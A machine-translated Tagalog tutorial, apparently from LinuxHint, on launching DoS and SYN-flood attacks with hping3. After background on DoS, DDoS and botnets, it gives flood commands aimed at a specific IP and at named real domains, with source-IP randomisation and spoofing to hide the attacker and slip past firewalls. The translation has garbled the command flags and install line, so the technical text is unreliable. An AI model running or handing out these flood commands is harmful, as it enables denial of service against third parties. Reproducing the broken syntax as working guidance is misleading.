hping3 baha ddos

Hping3 Flood Ddos



Ang tutorial na ito ay nakatuon sa mga pag-atake ng DDOS (Ipinamahagi ang Pagtanggi ng Serbisyo) gamit ang tool na hping3. Kung pamilyar ka na sa pag-atake ng DOS (Denial of Service) at DDOS maaari mong ipagpatuloy ang pagbabasa mula sa mga praktikal na tagubilin sa hping3, kung hindi man inirerekumenda na malaman tungkol sa kung paano gumagana ang mga pag-atake na ito.

Pag-atake ng DOS


Ang pag-atake ng denial of Service (DOS) ay isang napaka-simpleng pamamaraan upang tanggihan ang kakayahang ma-access ang mga serbisyo (iyon ang dahilan kung bakit ito tinawag na pag-atake ng serbisyo). Ang pag-atake na ito ay binubuo ng labis na karga sa target na may malalaking mga packet, o isang malaking dami ng mga ito.







Bagaman napakadaling isagawa ang pag-atake na ito, hindi nito ikinokompromiso ang impormasyon o privacy ng target, hindi ito isang matalim na atake at naglalayon lamang na maiwasan ang pag-access sa target.
Sa pamamagitan ng pagpapadala ng isang dami ng mga packet ang target ay hindi maaaring hawakan ang mga umaatake na pigilan ang server mula sa paghahatid ng mga lehitimong gumagamit.



Isinasagawa ang mga pag-atake ng DOS mula sa isang solong aparato, samakatuwid madaling pigilan ang mga ito sa pamamagitan ng pag-block sa attacker IP, ngunit maaaring baguhin ng magsasalakay at kahit spoof (i-clone) ang target na IP address ngunit hindi mahirap para sa mga firewall na harapin ang mga naturang pag-atake , taliwas sa kung ano ang nangyayari sa pag-atake ng DDOS.



Pag-atake ng DDOS

Ang isang ipinamamahagi na Denial of Service atake (DDOS) ay katulad ng isang pag-atake ng DOS ngunit isinasagawa mula sa iba't ibang mga node (o magkakaibang mga umaatake) nang sabay-sabay. Ang mga karaniwang pag-atake ng DDOS ay isinasagawa ng mga botnet. Ang mga botnet ay mga awtomatikong script o programa na nahahawa sa mga computer upang magsagawa ng isang awtomatikong gawain (sa kasong ito ay pag-atake ng DDOS). Ang isang hacker ay maaaring lumikha ng isang botnet at mahawahan ang maraming mga computer mula sa kung saan ang mga botnets ay maglulunsad ng mga pag-atake ng DOS, ang katunayan na maraming mga botnet ang pagbaril nang sabay-sabay na gawing isang pag-atake ng DDOS (kaya't tinatawag itong ipinamamahagi).





Siyempre, may mga pagbubukod kung saan ang mga pag-atake ng DDOS ay isinasagawa ng mga tunay na mang-atake ng tao, halimbawa ang pangkat ng mga hacker na Anonymous na isinama ng libu-libong mga tao sa buong mundo ay madalas na ginagamit ang diskarteng ito dahil sa madaling pagpapatupad nito (nangangailangan lamang ito ng mga boluntaryo na nagbahagi ng kanilang dahilan), halimbawa iyon kung paano iniwan ng Anonymous ang gobyerno ng Libya ng Gaddafi na ganap na nakadugtong sa panahon ng pagsalakay, ang estado ng Libya ay naiwang walang proteksyon bago libu-libong mga umaatake mula sa buong mundo.

Ang ganitong uri ng pag-atake, kapag isinasagawa mula sa maraming iba't ibang mga node ay napakahirap pigilan at ihinto at karaniwang nangangailangan ng espesyal na hardware upang harapin, ito ay dahil ang mga firewall at nagtatanggol na aplikasyon ay hindi handa na harapin ang libu-libong mga umaatake. Hindi ito ang kaso ng hping3, ang karamihan sa mga pag-atake na isinasagawa sa pamamagitan ng tool na ito ay ma-block ng mga nagtatanggol na aparato o software, ngunit kapaki-pakinabang ito sa mga lokal na network o laban sa mga hindi magagawang protektadong target.



Tungkol sa hping3

Pinapayagan ka ng tool na hping3 na magpadala ng mga manipulasyong packet. Pinapayagan ka ng tool na ito na kontrolin ang laki, dami at pagkakawatak-watak ng mga packet upang ma-overload ang target at i-bypass o atake ang mga firewall. Ang Hping3 ay maaaring maging kapaki-pakinabang para sa seguridad o mga layunin sa pagsubok ng kakayahan, gamit ito maaari mong subukan ang pagiging epektibo ng mga firewall at kung ang isang server ay maaaring hawakan ang isang malaking halaga ng mga packet. Sa ibaba makikita mo ang mga tagubilin sa kung paano gamitin ang hping3 para sa mga layuning pagsubok sa seguridad.

Pagsisimula sa pag-atake ng DDOS gamit ang hping3:

Sa Debian at batay sa mga pamamahagi ng Linux maaari kang mag-install ng hping3 sa pamamagitan ng pagpapatakbo:

#apti-installhping3-at

Ang isang simpleng pag-atake ng DOS (hindi DDOS) ay:

#sudohping3-S - dugo -V -p 80170.155.9.185

Kung saan:
sudo: nagbibigay ng mga kinakailangang pribilehiyo upang magpatakbo ng hping3.
hping3:
tawag sa hping3 na programa.
-S: tinutukoy ang mga SYN packet.
–Dugo: shoot sa paghuhusga, ang mga tugon ay hindi papansinin (iyon ang dahilan kung bakit hindi maipapakita ang mga tugon) at ang mga packet ay ipapadala nang mabilis hangga't maaari.
-V: Verbosity.
-p 80: port 80, maaari mong palitan ang numerong ito para sa serbisyong nais mong atake.
170.155.9.185: target na IP.

Baha gamit ang mga SYN packet laban sa port 80:

Ang sumusunod na halimbawa ay naglalarawan ng isang pag-atake ng SYN laban sa lacampora.org:

#sudohping3 lacampora.org-q -n -d 120 -S -p 80 - dugo - mapagkukunan ng rand

Kung saan:
Lacampora.org: ang target
-q: maikling output
-n: ipakita ang target IP sa halip na host.
-d 120: itakda ang laki ng packet
–Rand-source: itago ang IP address.

Ang sumusunod na halimbawa ay nagpapakita ng isa pang posibleng halimbawa ng pagbaha:

Baha sa SYN laban sa port 80:

#sudohping3- mapagkukunan ng randivan.com-S -q -p 80 - dugo

Sa hping3 maaari mo ring pag-atake ang iyong mga target sa isang pekeng IP, upang mapalampas ang isang firewall maaari mo ring i-clone ang iyong target na IP mismo, o anumang pinapayagan na address na maaari mong malaman (maaari mong makamit ito halimbawa kasama ang Nmap o isang sniffer upang makinig na itinatag. mga koneksyon).

Ang syntax ay:

#sudohping3-sa <FAKE IP> <target> -S -q -p 80 --mas mabilis -c2

Sa praktikal na halimbawang ito ang pag-atake ay tila:

#sudohping3-sa190.0.175.100 190.0.175.100-S -q -p 80 --mas mabilis -c2

Inaasahan kong nahanap mo ang kapaki-pakinabang na tutorial na ito sa hping3. Patuloy na sundin ang LinuxHint para sa higit pang mga tip at pag-update sa Linux at networking.